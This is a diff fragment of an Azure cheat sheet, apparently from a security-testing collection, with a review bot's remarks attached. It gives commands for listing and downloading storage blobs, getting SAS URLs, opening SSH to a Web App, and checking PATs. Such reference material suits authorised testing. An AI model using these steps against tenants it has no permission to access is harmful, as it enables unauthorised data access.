PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
|
||||||
|
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
||||||
|
```
|
||||||
|
|
||||||
|
### SAS URL
|
||||||
|
|
||||||
|
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
||||||
|
* Click on **Open Connect Dialog** in the left menu.
|
||||||
|
* Select **Blob container**.
|
||||||
|
* On the **Select Authentication Method** page
|
||||||
|
* Select **Shared access signature (SAS)** and click on Next
|
||||||
|
* Copy the URL in **Blob container SAS URL** field.
|
||||||
|
|
||||||
|
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
||||||
|
|
||||||
|
|
||||||
|
## Azure Web App
|
||||||
|
|
||||||
|
### SSH Connection
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure Devops
|
## Azure Devops
|
||||||
|
|
||||||
* Verify the validity of an Azure Personal Access Token (PAT)
|
* Verify the validity of an Azure Personal Access Token (PAT)
|
||||||
|
|
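Review bot: both curl lines in the `KeyVault` block use `apiversion=2017-09-01`, while the same requests in the Tokens.md hunk of this commit use `api-version=2017-09-01`, the documented query parameter; fix the two moved lines, which carried the typo over from the README. `Get-AzStorageBlobContent ... -Blob` ends without a blob name, so the line is incomplete as written; add `<BLOB-NAME>`. The `:warning:` note about using `subscription`(username/password) does not say which credential is meant (a subscription is not a credential); rephrase it. Fence tags again alternate between `powershell` and `ps1` within the same file.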